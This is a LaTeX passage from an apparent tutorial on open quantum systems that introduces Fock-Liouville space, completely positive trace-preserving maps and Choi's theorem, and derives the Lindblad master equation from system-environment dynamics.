In this section, we revise a useful framework for both analytical and numerical calculations. It is clear that some linear combinations of density matrices are valid density matrices (as long as they preserve positivity and trace $1$). Because of that, we can create a Hilbert space of density matrices just by defining a scalar product. This is clear for finite systems because in this case scalar space and Hilbert space are the same things. It also happens to be true for infinite spaces. This allows us to define a linear space of matrices, converting the matrices effectively into vectors ($\rho\to\kket{\rho}$). This is called Fock-Liouville space (FLS). The usual definition of the scalar product of matrices $\phi$ and $\rho$ is defined as $\bbracket{\phi}{\rho}\equiv\textrm{Tr}\cor{\phi^\dagger\rho}$. The Liouville super-operator from Eq. (\ref{eq:vne}) is now an operator acting on the Hilbert space of density matrices. The main utility of the FLS is to allow the matrix representation of the evolution operator.
\vspace{0.5cm}
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 5. Time evolution of a two-level system.}
\vspace{0.25cm}
The density matrix of our system (\ref{eq:denmat}) can be expressed in the FLS as
\begin{equation}
\kket{\rho}=
\begin{pmatrix}
\rho_{00} \\
\rho_{01} \\
\rho_{10} \\
\rho_{11}
\end{pmatrix}.
\end{equation}
\vspace{0.25cm}
The time evolution of a mixed state is given by the von-Neumann equation (\ref{eq:vne}). The Liouvillian superoperator can now be expressed as a matrix
\begin{equation}
\tilde{{\cal L}}=
\left(
\begin{array}{cccc}
0 & i \Omega & -i\Omega & 0 \\
i\Omega & i E &0 & -i\Omega \\
-i\Omega & 0 & -iE & i\Omega \\
0 & -i\Omega & i\Omega & 0
\end{array}
\right),
\end{equation}
where each row is calculated just by observing the output of the operation $-i \cor{H,\rho}$ in the computational basis of the density matrices space. The time evolution of the system now corresponds to the matrix equation $\frac{d \kket{\rho}}{dt}=\tilde{{\cal L}} \kket{\rho}$, that in matrix notation would be
\begin{equation}
\begin{pmatrix}
\dot{\rho}_{00} \\
\dot{\rho}_{01} \\
\dot{\rho}_{10} \\
\dot{\rho}_{11}
\end{pmatrix}
=
\left(
\begin{array}{cccc}
0 & i \Omega & -i\Omega & 0 \\
i\Omega & i E &0 & -i\Omega \\
-i\Omega & 0 & -i E & i\Omega \\
0 & -i\Omega & i\Omega & 0
\end{array}
\right)
\begin{pmatrix}
\rho_{00} \\
\rho_{01} \\
\rho_{10} \\
\rho_{11}
\end{pmatrix}
\end{equation}
\vspace{0.25cm}
\label{minipage4}
\end{minipage}
}
\end{center}
\vspace{0.5cm}
\newpage
\section{CPT-maps and the Lindblad Master Equation.}
\label{cpt}
\subsection{Completely positive maps}
The problem we want to study is to find the most general Markovian transformation set between density matrices. Until now, we have seen that quantum systems can evolve in two way, by a coherent evolution given (Postulate \ref{post3}) and by collapsing after a measurement (Postulate \ref{post4}). Many efforts have been made to unify these two ways of evolving \cite{schlosshauer_07}, without giving a definite answer so far. It is reasonable to ask what is the most general transformation that can be performed in a quantum system, and what is the dynamical equation that describes this transformation.
We are looking for maps that transform density matrices into density matrices. We define $\rho({\cal H})$ as the space of all density matrices in the Hilbert space ${\cal H}$. Therefore, we are looking for a map of this space onto itself, ${\cal V}:\rho({\cal H})\to\rho({\cal H})$. To ensure that the output of the map is a density matrix this should fulfil the following properties
\begin{itemize}
\item Trace preserving. $\textrm{Tr}\cor{{\cal V} A}=\textrm{Tr}\cor{A},$ $\forall A\in O({\cal H})$.
\item Completely positive (see below).
\end{itemize}
Any map that fulfils these two properties is called a {\it completely positive and trace-preserving map (CPT-maps)}. The first property is quite apparent, and it does not require more thinking. The second one is a little more complicated, and it requires an intermediate definition.
\vspace{0.5cm}
\begin{definition}
A map ${\cal V}$ is positive iff $\forall A\in B({\cal H})$ s.t. $A \ge 0 \Rightarrow {\cal V} A \ge 0$.
\end{definition}
\vspace{0.5cm}
\noindent
This definition is based in the idea that, as density matrices are positive, any physical map should transform positive matrices into positive matrices. One could naively think that this condition must be sufficient to guarantee the physical validity of a map. It is not. As we know, there exist composite systems, and our density matrix could be the partial trace of a more complicated state. Because of that, we need to impose a more general condition.
\vspace{0.5cm}
\begin{definition}
A map ${\cal V}$ is completely positive iff $\forall n\in \mathbb{N}$, ${\cal V}\otimes \mathbb 1_n$ is positive.
\end{definition}
\vspace{0.5cm}
\noindent
To prove that not all positive maps are completely positive, we need a counterexample. A canonical example of an operation that is positive but fails to be completely positive is the matrix transposition. If we have a Bell state in the form $\ket{\psi_B}=\frac{1}{\sqrt{2}} \pare{\ket{01}+\ket{10}}$ its density matrix can be expressed as
\begin{equation}
\rho_B=\frac{1}{2} \pare{\op{0}{0} \otimes \op{1}{1} + \op{1}{1} \otimes \op{0}{0} + \op{0}{1} \otimes\op{1}{0} + \op{1}{0} \otimes\op{0}{1}},
\end{equation}
with a matrix representation
\begin{eqnarray}
\rho_B= \frac{1}{2} \left\{
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\right.
\nonumber\\
\left.
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0\\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\right\}.
\end{eqnarray}
A little algebra shows that the full form of this matrix is
\begin{equation}
\rho_B=\left(
\begin{array}{cccc}
0 & 0 & 0 & 0\\
0 & 1 & 1 & 0\\
0 & 1 & 1 & 0\\
0 & 0 & 0 & 0
\end{array}
\right),
\end{equation}
and it is positive.
It is easy to check that the transformation $\mathbb 1\otimes T_2 $, meaning that we transpose the matrix of the second subsystem leads to a non-positive matrix
\begin{eqnarray}
\pare{ \mathbb 1\otimes T_2 } \rho_B= \frac{1}{2} \left\{
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\right.
\nonumber\\
\left.
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0 \\
\end{array}
\right)
\right\}.
\end{eqnarray}
The total matrix is
\begin{equation}
\pare{ \mathbb 1\otimes T_2 } \rho_B=
\left(
\begin{array}{cccc}
0 & 0 & 0 & 1\\
0 & 1 & 0 & 0\\
0 & 0 & 1 & 0\\
1 & 0 & 0 & 0
\end{array}
\right),
\end{equation}
with $-1$ as an eigenvalue. This example illustrates how the non-separability of quantum mechanics restrict the operations we can perform in a subsystem. By imposing this two conditions, we can derive a unique master equation as the generator of any possible Markovian CPT-map.
\subsection{Derivation of the Lindblad Equation from microscopic dynamics}
The most common derivation of the Lindblad master equation is based on Open Quantum Theory. The Lindblad equation is then an effective motion equation for a subsystem that belongs to a more complicated system. This derivation can be found in several textbooks like Breuer and Petruccione's \cite{breuer_02} as well as Gardiner and Zoller's \cite{gardiner_00}. Here, we follow the derivation presented in Ref. \cite{manzano:av18}. Our initial point is displayed in Figure \ref{fig:fig01}. A total system belonging to a Hilbert space ${\cal H}_T$ is divided into our system of interest, belonging to a Hilbert space ${\cal H}$, and the environment living in ${\cal H}_E$.
\begin{figure}
\begin{center}
\includegraphics[scale=0.2]{figure01}
\end{center}
\caption{A total system (belonging to a Hilbert space ${\cal H}_T$, with states described by density matrices $\rho_T$, and with dynamics determined by a Hamiltonian $H_T$) divided into the system of interest, `System', and the environment. }
\label{fig:fig01}
\end{figure}
The evolution of the total system is given by the von Neumann equation (\ref{eq:vne}).
\begin{equation}
\dot{\rho_T}(t)=-i \left[ H_T,\rho_T(t) \right].
\end{equation}
As we are interested in the dynamics of the system, without the environment, we trace over the environment degrees of freedom to obtain the reduced density matrix of the system $\rho(t)=\textrm{Tr}_E[\rho_T]$. To separate the effect of the total hamiltonian in the system and the environment we divide it in the form $H_T=H_S \otimes \mathbb 1_E + \mathbb 1_S \otimes H_E + \alpha H_I $, with $H\in{\cal H}$, $H_E\in {\cal H}_E$, and $H_I\in {\cal H}_T$, and being $\alpha$ a measure of the strength of the system-environment interaction. Therefore, we have a part acting on the system, a part acting on the environment, and the interaction term. Without losing any generality, the interaction term can be decomposed in the following way
\begin{equation}
H_I = \sum_i S_i \otimes E_i,
\label{eq:hint}
\end{equation}
with $S_i\in B({\cal H}$) and $E_i\in B({\cal H}_E)$\footnote{From now on we will not writethe identity operators of the Hamiltonian parts explicitly when they can be inferred from the context.}.
To better describe the dynamics of the system, it is useful to work in the interaction picture (see Ref. \cite{galindo_pascual_90} for a detailed explanation about Schr\"odinger, Heisenberg, and interaction pictures). In the interaction picture, density matrices evolve with time due to the interaction Hamiltonian, while operators evolve with the system and environment Hamiltonian. An arbitrary operator $O\in {\cal B}({\cal H}_T)$ is represented in this picture by the time-dependent operator $\hat{O}(t)$, and its time evolution is
\begin{equation}
\hat{O}(t) = e^{i(H+H_E)t} \,O\, e^{-i(H+H_E)t}.
\end{equation}
The time evolution of the total density matrix is given in this picture by
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(t)}.
\label{eq:vnint}
\end{equation}
This equation can be easily integrated to give
\begin{equation}
\hat{\rho}_T(t) = \hat{\rho}_T(0) -i \alpha \int_0^t ds \cor{\hat{H}_I(s),\hat{\rho}_T(s)}.
\label{eq:integint}
\end{equation}
By this formula, we can obtain the exact solution, but it still has the complication of calculating an integral in the total Hilbert space. It is also troublesome the fact that the state $\tilde{\rho}(t)$ depends on the integration of the density matrix in all previous time. To avoid that we can introduce Eq. (\ref{eq:integint}) into Eq. (\ref{eq:vnint}) giving
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(s)} }.
\end{equation}
By applying this method one more time we obtain
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} } + O(\alpha^3).
\label{eq:orderthree}
\end{equation}
After this substitution, the integration of the previous states of the system is included only in the terms that are $O(\alpha^3)$ or higher. At this moment, we perform our first approximation by considering that the strength of the interaction between the system and the environment is small. Therefore, we can avoid high-orders in Eq. (\ref{eq:orderthree}). Under this approximation we have
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} }.
\label{eq:exp}
\end{equation}
We are interested in finding an equation of motion for $\rho$, so we trace over the environment degrees of freedom
\begin{equation}
\frac{d \hat{\rho}(t)}{dt}= \textrm{Tr}_E \left[\frac{d \hat{\rho}_T(t)}{dt} \right] = -i \alpha \textrm{Tr}_E\cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} }.
\label{eq:exp2}
\end{equation}
This is not a closed time-evolution equation for $\hat{\rho}(t)$, because the time derivative still depends on the full density matrix $\hat{\rho}_T(t)$. To proceed, we need to make two more assumptions. First, we assume that $t=0$ the system and the environment have a separable state in the form $\rho_T(0)=\rho(0) \otimes \rho_E(0)$. This means that there are not correlations between the system and the environment. This may be the case if the system and the environment have not interacted at previous times or if the correlations between them are short-lived. Second, we assume that the initial state of the environment is thermal, meaning that it is described by a density matrix in the form $\rho_E(0)=\exp\left( -H_E/T \right)/\textrm{Tr}[\exp\left( -H_E/T \right)]$, being $T$ the temperature and taking the Boltzmann constant as $k_B=1$. By using these assumptions, and the expansion of $H_I$ (\ref{eq:hint}), we can calculate an expression for the first element of the r.h.s of Eq. (\ref{eq:exp2}).
\begin{equation}
\textrm{Tr}_E\cor{\hat{H}_I(t),\hat{\rho}_T(0)} = \sum_i \left( \hat{S}_i(t) \hat{\rho}(0) \textrm{Tr}_E \left[ \hat{E}_i(t) \hat{\rho}_E(0) \right] -
\hat{\rho}(0) \hat{S}_i(t) \textrm{Tr}_E \left[ \hat{\rho}_E(0) \hat{E}_i(t) \right] \right).
\label{eq:zero}
\end{equation}
To calculate the explicit value of this term, we may use that $\left< E_i\right>=\textrm{Tr}[E_i \rho_E(0)]=0$ for all values of $i$. This looks like a strong assumption, but it is not. If our total Hamiltonian does not fulfil it, we can always rewrite it as
$H_T=\left( H+ \alpha \sum_i \left< E_i\right> S_i\right) + H_E + \alpha H_i'$, with $H'_i= \sum_i S_i \otimes (E_i- \left< E_i\right>)$. It is clear that now $\left< E'_i \right>=0$, with $E'_i=E_i- \left< E_i\right>$, and the system Hamiltonian is changed just by the addition of an energy shift that does no affect the system dynamics. Because of that, we can assume that $\left< E_i\right>=0$ for all $i$. Using the cyclic property of the trace, it is easy to prove that the term of Eq. (\ref{eq:zero}) is equal to zero, and the equation of motion (\ref{eq:exp2}) reduces to
\begin{equation}
\dot{\hat{\rho}}(t)= -\alpha^2 \int_0^t ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} }.
\label{eq:exp3}
\end{equation}
This equation still includes the entire state of the system and environment. To unravel the system from the environment, we have to make a more restrictive assumption. As we are working in the weak coupling regime, we may suppose that the system and the environment are non-correlated during all the time evolution. Of course, this is only an approximation. Due to the interaction Hamiltonian, some correlations between system and environment are expected to appear. On the other hand, we may assume that the timescales of correlation ($\tau_\text{corr}$) and relaxation of the environment ($\tau_\text{rel}$) are much smaller than the typical system timescale ($\tau_\text{sys}$), as the coupling strength is very small ($\alpha<<$). Therefore, under this strong assumption, we can assume that the environment state is always thermal and is decoupled from the system state, $\hat{\rho}_T(t)=\hat{\rho}(t) \otimes \hat{\rho}_E(0)$. Eq. (\ref{eq:exp3}) then transforms into
\begin{equation}
\dot{\hat{\rho}}(t)= -\alpha^2 \int_0^t ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}(t) \otimes \hat{\rho}_E(0)} }.
\end{equation}
The equation of motion is now independent for the system and local in time. It is still non-Markovian, as it depends on the initial state preparation of the system. We can obtain a Markovian equation by realising that the kernel in the integration and that we can extend the upper limit of the integration to infinity with no real change in the outcome. By doing so, and by changing the integral variable to $s\rightarrow t-s$, we obtain the famous {\it Redfield equation} \cite{redfield:IBM57}.
\begin{equation}
\dot{\hat{\rho}}(t)= -\alpha^2 \int_0^{\infty} ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s-t),\hat{\rho}(t) \otimes \hat{\rho}_E(0)} }.
\label{eq:redfield}
\end{equation}
It is known that this equation does not warrant the positivity of the map, and it sometimes gives rise to density matrices that are non-positive. To ensure complete positivity, we need to perform one further approximation, the {\it rotating wave} approximation. To do so, we need to use the spectrum of the superoperator $\tilde{H}A\equiv \cor{H,A}$, $\forall A\in {\cal B}({\cal H})$. The eigenvectors of this superoperator form a complete basis of space ${\cal B}({\cal H})$ and, therefore, we can expand the system-environment operators from Eq. (\ref{eq:hint}) in this basis
\begin{equation}
S_i = \sum_{\omega} S_i(\omega),
\label{eq:expeigen}
\end{equation}
where the operators $S_i(\omega)$ fulfils
\begin{equation}
\cor{H,S_i(\omega)}= -\omega S_i(\omega),
\end{equation}
being $\omega$ the eigenvalues of $\tilde{H}$. It is easy to take also the Hermitian conjugated
\begin{equation}
\cor{H,S_i^{\dagger}(\omega)}= \omega S_i^{\dagger}(\omega).
\end{equation}
To apply this decomposition, we need to change back to the Schr\"odinger picture for the term of the interaction Hamiltonian acting on the system's Hilbert space. This is done by the expression $\hat{S}_k= e^{it H} S_k e^{-it H}$. By using the eigen-expansion (\ref{eq:expeigen}) we arrive to
\begin{equation}
\tilde{H}_i(t) = \sum_{k,\omega} e^{-i\omega t} S_k(\omega) \otimes \tilde{E}_k (t) = \sum_{k,\omega} e^{i\omega t} S_k^{\dagger}(\omega) \otimes \tilde{E}_k^{\dagger} (t).
\end{equation}
To combine this decomposition with Redfield equation (\ref{eq:redfield}), we first may expand the commutators.
\begin{eqnarray}
\hspace{-2cm}
\dot{\hat{\rho}}(t)= -\alpha^2 \textrm{Tr}\left[ \int_0^\infty ds\, \hat{H}_I (t) \hat{H}_I (t-s) \hat{\rho} (t) \otimes \hat{\rho}_E(0)
- \int_0^\infty ds\, \hat{H}_I (t) \hat{\rho} (t) \otimes \hat{\rho}_E(0) \hat{H}_I (t-s) \right. \nonumber \\
\hspace{-2cm}
\left. - \int_0^\infty ds\, \hat{H}_I (t-s) \hat{\rho} (t) \otimes \hat{\rho}_E(0) \hat{H}_I (t)
+ \int_0^\infty ds\, \hat{\rho} (t) \otimes \hat{\rho}_E(0) \hat{H}_I (t-s) \hat{H}_I (t)
\right].
\end{eqnarray}
We now apply the eigenvalue decomposition in terms of $S_k(\omega)$ for $\hat{H}_I(t-s)$ and in terms of $S_k^{\dagger}(\omega')$ for $\hat{H}_I(t)$. By using the permutation property of the trace and the fact that $\cor{H_E,\rho_E(0)}=0$, and after some non-trivial algebra we obtain
\begin{equation}
\dot{\hat{\rho}}(t) =\sum_{\substack{\omega,\omega'\\ k,l }} \left( e^{i (\omega'-\omega)t }\, \Gamma_{kl} (\omega) \cor{S_l(\omega)\hat{\rho} (t), S_k^\dagger(\omega') } +
e^{i (\omega-\omega')t } \, \Gamma_{lk}^* (\omega') \cor{S_l(\omega), \hat{\rho} (t) S_k^\dagger(\omega') } \right),
\label{eq:rwae}
\end{equation}
where the effect of the environment has been absorbed into the factors
\begin{equation}
\Gamma_{kl} (\omega) \equiv \int_0^{\infty} ds\, e^{i\omega s} \textrm{Tr}_E \left[ \tilde{E}_k^\dagger (t) \tilde{E}_l (t-s) \rho_E(0) \right],
\end{equation}
where we are writing the environment operators of the interaction Hamiltonian in the interaction picture ($\hat{E}_l(t)=e^{iH_Et} E_l e^{-iH_Et} $). At this point, we can already perform the rotating wave approximation. By considering the time-dependency on Eq. (\ref{eq:rwae}), we conclude that the terms with $\left| \omega-\omega' \right|>>\alpha^2$ will oscillate much faster than the typical timescale of the system evolution. Therefore, they do not contribute to the evolution of the system. In the low-coupling regime $(\alpha\rightarrow 0)$ we can consider that only the resonant terms, $\omega=\omega'$, contribute to the dynamics and remove all the others. By applying this approximation to Eq. (\ref{eq:rwae}) reduces to
\begin{equation}
\dot{\hat{\rho}}(t) =\sum_{\substack{\omega\\ k,l }} \left( \Gamma_{kl} (\omega) \cor{S_l(\omega)\hat{\rho} (t), S_k^\dagger(\omega) } +
\Gamma_{lk}^* (\omega) \cor{S_l(\omega), \hat{\rho} (t) S_k^\dagger(\omega) } \right).
\end{equation}
To divide the dynamics into Hamiltonian and non-Hamiltonian we now decompose the operators $\Gamma_{kl}$ into Hermitian and non-Hermitian parts, $\Gamma_{kl}(\omega) = \frac{1}{2} \gamma_{kl}(\omega) + i\pi_{kl} $, with
\begin{eqnarray}
\pi_{kl}(\omega) \equiv \frac{-i}{2} \left(\Gamma_{kl} (\omega) - \Gamma_{kl}^*(\omega) \right) \nonumber\\
\gamma_{kl}(\omega) \equiv \Gamma_{kl} (\omega) + \Gamma_{kl}^*(\omega) = \int_{-\infty}^{\infty} ds e^{i\omega s}
\textrm{Tr}\left[ \hat{E}_k^\dagger (s) E_l \hat{\rho}_E(0)\right].
\end{eqnarray}
By these definitions we can separate the Hermitian and non-Hermitian parts of the dynamics and we can transform back to the Schr\"odinger picture
\begin{equation}
\dot{\rho}(t) = -i \left[ H+H_{Ls} ,\rho(t) \right] +
\sum_{\substack{\omega\\ k,l }} \gamma_{kl} (\omega) \left( S_l (\omega) \rho(t) S_k^\dagger (\omega) -
\frac{1}{2} \left\{ S_k^\dagger S_l (\omega) , \rho(t) \right\} \right).
\label{eq:me1}
\end{equation}
The Hamiltonian dynamics now is influenced by a term $H_{Ls} = \sum_{\omega,k,l} \pi_{kl} (\omega) S_k^\dagger (\omega)S_l (\omega)$. This is usually called a {\it Lamb shift} Hamiltonian and its role is to renormalize the system energy levels due to the interaction with the environment. Eq. (\ref{eq:me1}) is the first version of the Markovian Master Equation, but it is not in the Lindblad form yet.
It can be easily proved that the matrix formed by the coefficients $\gamma_{kl}(\omega)$ is positive as they are the Fourier's transform of a positive function $\left(\textrm{Tr}\left[ \hat{E}_k^\dagger (s) E_l \hat{\rho}_E(0)\right]\right)$. Therefore, this matrix can be diagonalised. This means that we can find a unitary operator, $O$, s.t.
\begin{equation}
O\gamma(\omega) O^\dagger=
\left(\begin{array}{cccc}
d_1(\omega) & 0 & \cdots & 0\\
0 & d_2(\omega) & \cdots & 0 \\
\vdots & \vdots & \ddots & 0\\
0 & 0 & \cdots & d_N(\omega)
\end{array}\right).
\end{equation}
We can now write the master equation in a diagonal form
\begin{equation}
\dot{\rho}(t) = -i \left[ H+H_{Ls} ,\rho(t) \right] +
\sum_{i,\omega} \left( L_i (\omega) \rho(t) L_i^\dagger (\omega) -
\frac{1}{2} \left\{ L_i^\dagger L_i (\omega) , \rho(t) \right\} \right)\equiv {\cal L} \rho(t).
\label{eq:me2}
\end{equation}
This is the celebrated Lindblad (or Lindblad-Gorini-Kossakowski-Sudarshan) Master Equation. In the simplest case, there will be only one relevant frequency $\omega$, and the equation can be further simplified to
\begin{equation}
\dot{\rho}(t) = -i \left[ H+H_{Ls} ,\rho(t) \right] +
\sum_{i} \left( L_i \rho(t) L_i^\dagger -
\frac{1}{2} \left\{ L_i^\dagger L_i, \rho(t) \right\} \right)\equiv {\cal L} \rho(t).
\label{eq:me3}
\end{equation}
The operators $L_i$ are usually referred to as {\it jump operators}.
\subsection{Derivation of the Lindblad Equation as a CPT generator}
The second way of deriving Lindblad equation comes from the following question: What is the most general (Markovian) way of mapping density matrix onto density matrices? This is usually the approach from quantum information researchers that look for general transformations of quantum systems. We analyse this problem following mainly Ref. \cite{wilde_17}.
To start, we need to know what is the form of a general CPT-map.
\vspace{0.5cm}
\begin{lemma}
Any map ${\cal V}:B\pare{{\cal H}}\to B\pare{{\cal H}}$ that can be written in the form ${\cal V}\rho=V^\dagger \rho V^{\phantom{\dagger}}$ with $V\in B\pare{{\cal H}}$ is positive.
\end{lemma}
\vspace{0.5cm}
\noindent
The proof of the lemma requires a little algebra and a known property of normal matrices
\vspace{0.5cm}
\noindent
\textbf{Proof.}
\noindent
If $\rho\ge0 \Rightarrow \rho=A^\dagger A^{\phantom{\dagger}}$, with $A\in B({\cal H})$. Therefore, ${\cal V}\rho=V^\dagger\rho V^{\phantom{\dagger}}\Rightarrow \bra{\psi} V^\dagger\rho V\ket{\psi} = \bra{\psi} V^\dagger A^{\dagger}A V\ket{\psi}=\norm{ AV\ket{\psi}}\ge 0$. Therefore, if $\rho$ is positive, the output of the map is also positive.
\vspace{0.25 cm}
\noindent
\textbf{End of the proof.}
\vspace{0.5cm}
\noindent
This is a sufficient condition for the positivity of a map, but it is not necessary. It could happen that there are maps that cannot be written in this form, but they are still positive. To go further, we need a more general condition, and this comes in the form of the next theorem.
\vspace{0.5cm}
\begin{theorem}
Choi's Theorem.
\noindent
A linear map ${\cal V}:B({\cal H})\to B({\cal H})$ is completely positive iff it can be expressed as
\begin{equation}
{\cal V}\rho=\sum_i V_i^\dagger \rho V^{\phantom{\dagger}}_i
\label{eq:choimap}
\end{equation}
with $V_i\in B({\cal H})$.
\end{theorem}
\vspace{0.5cm}
\noindent
The proof of this theorem requires some algebra.
\vspace{0.5cm}
\noindent
\textbf{Proof}
\noindent
The `if' implication is a trivial consequence of the previous lemma. To prove the converse, we need to extend the dimension of our system by the use of an auxiliary system. If $d$ is the dimension of the Hilbert space of pure states, ${\cal H}$, we define a new Hilbert space of the same dimension ${\cal H}_A$.
We define a maximally entangled pure state in the bipartition ${\cal H}_A \otimes {\cal H}$ in the way
\begin{equation}
\ket{\Gamma}\equiv \sum_{i=0}^{d-1} \ket{i}_A \otimes \ket{i},
\label{eq:gamma}
\end{equation}
being $\key{\ket{i}}$ and ${\key{\ket{i}_A}}$ arbitrary orthonormal bases for ${\cal H}$ and ${\cal H}_A$.
We can extend the action of our original map ${\cal V}$, that acts on ${\cal B}({\cal H})$ to our extended Hilbert space by defining the map ${\cal V}_2:{\cal B}( {\cal H}_A) \otimes {\cal B}({\cal H}) \to {\cal B}( {\cal H}_A) \otimes {\cal B}({\cal H})$ as
\begin{equation}
{\cal V}_2\equiv \mathbb 1_{{\cal B}( {\cal H}_A)} \otimes {\cal V}.
\end{equation}
Note that the idea behind this map is to leave the auxiliary subsystem invariant while applying the original map to the original system. This map is positive because ${\cal V}$ is completely positive. This may appear trivial, but as it has been explained before complete positivity is a more restrictive property than positivity, and we are looking for a condition to ensure complete positivity.
We can now apply the extended map to the density matrix corresponding to the maximally entangled state (\ref{eq:gamma}), obtaining
\begin{equation}
{\cal V}_2 \proj{\Gamma} = \sum_{i,j=0}^{d-1} \op{i}{j} \otimes {\cal V} \op{i}{j}.
\label{eq:map2}
\end{equation}
Now we can use the maximal entanglement of the state $\ket{\Gamma}$ to relate the original map ${\cal V}$ and the action ${\cal V}_2 \proj{\Gamma}$ by taking the matrix elements with respect to ${\cal H}_A$.
\begin{equation}
{\cal V}\op{i}{j} = \bra{i}_A \pare{ {\cal V}_2\op{\Gamma}{\Gamma} }\ket{j}_A.
\label{eq:elementsv}
\end{equation}
To relate this operation to the action of the map to an arbitrary vector $\ket{\psi}\in {\cal H}_A \otimes {\cal H}$, we can expand it in this basis as
\begin{equation}
\ket{\psi} = \sum_{i=0}^{d-1} \sum_{j=0}^{d-1} \alpha_{ij} \ket{i}_A \otimes \ket{j}.
\end{equation}
We can also define an operator $V_{\ket{\psi}} \in {\cal B} \pare{{\cal H}}$ s.t. it transforms $\ket{\Gamma}$ into $\ket{\psi}$. Its explicit action would be written as
\begin{eqnarray}
\hspace{-2cm}
\pare{\mathbb 1_A \otimes V_{\ket{\psi}}} \ket{\Gamma}=&\sum_{i,j=0}^{d-1} \alpha_{ij} \pare{\mathbb 1_A \otimes \op{j}{i} } \pare{ \sum_{k=0}^{d-1} \ket{k} \otimes \ket{k}
= \sum_{i,j,k=0}^{d-1} \alpha_{ij} \pare{\ket{k} \otimes \ket{j}} \bracket{i}{k} \nonumber\\
&= \sum_{i,j,k=0}^{d-q} \alpha_{ij} \pare{\ket{k} \otimes \ket{j}} \delta_{i,k}
= \sum_{i,j=0}^{d-1} \alpha_{ij} \ket{i}\otimes \ket{j} = \ket{\psi}.
\label{eq:opsi}
\end{eqnarray}
At this point, we have related the vectors in the extended space ${\cal H}_A \otimes {\cal H}$ to operators acting on ${\cal H}$. This can only be done because the vector $\ket{\Gamma}$ is maximally entangled. We go now back to our extended map ${\cal V}_2$. Its action on $\proj{\Gamma}$ is given by Eq. (\ref{eq:map2}) and as it is a positive map it can be expanded as
\begin{equation}
{\cal V}_2\pare{\proj{\Gamma}} =\sum_{l=0}^{d^2-1}\proj{v_l}.
\label{eq:exp}
\end{equation}
with $\ket{v_l}\in{\cal H}_A\otimes {\cal H}$. The vectors $\ket{v_l}$ can be related to operators in ${\cal H}$ as in Eq. (\ref{eq:opsi}).
\begin{equation}
\ket{v_l}=\pare{\mathbb 1_A\otimes\ V_l}\ket{\Gamma}.
\end{equation}
Based on this result we can calculate the product of an arbitrary vector $\ket{i}_A\in{\cal H}_A$ with $\ket{v_l}$.
\begin{equation}
\bra{i}_A \ket{v_l}=\bra{i}_A \pare{\mathbb 1_A \otimes V_l} \ket{\Gamma}=V_l \sum_{k=0}^{d-1} \bracket{i}{k}_A \otimes\ket{k}.
\end{equation}
This is the last ingredient we need for the proof.
We come back to the original question, we want to characterise the map ${\cal V}$. We do so by applying it to an arbitrary basis element $\op{i}{j}$ of ${\cal B}\pare{{\cal H}}$.
\begin{eqnarray}
\hspace{-2.cm}
{\cal V}\pare{\op{i}{j}} = \pare{ \bra{i}_A \otimes \mathbb 1_A} {\cal V}_2\pare{\proj{\Gamma}} \pare{\ket{j}_A\otimes\mathbb 1_A}
= \pare{\bra{i}_A \otimes \mathbb 1_A} \cor{ \sum_{l=0}^{d^2-1} \proj{v_l} } \pare{ \ket{j}_A\otimes\mathbb 1_A } \nonumber\\
= \sum_{l=0}^{d^2-1} \cor{\pare{\bra{i}_A \otimes \mathbb 1_A}\ket{v_l}} \cor{\bra{v_l}\pare{\ket{j}_A \otimes \mathbb 1_A}}
= \sum_{l=0}^{d^2-1} V_l\op{i}{j} V_l.
\end{eqnarray}
As $\op{i}{j}$ is an arbitrary element of a basis any operator can be expanded in this basis. Therefore, it is straightforward to prove that
\begin{equation}
{\cal V} \rho=\sum_l^{d^2-l} V^{\dagger}_l\rho V^{\phantom{\dagger}}_l.
\nonumber
\end{equation}
\vspace{0.25 cm}
\noindent
\textbf{End of the proof.}
\vspace{0.5cm}
\noindent
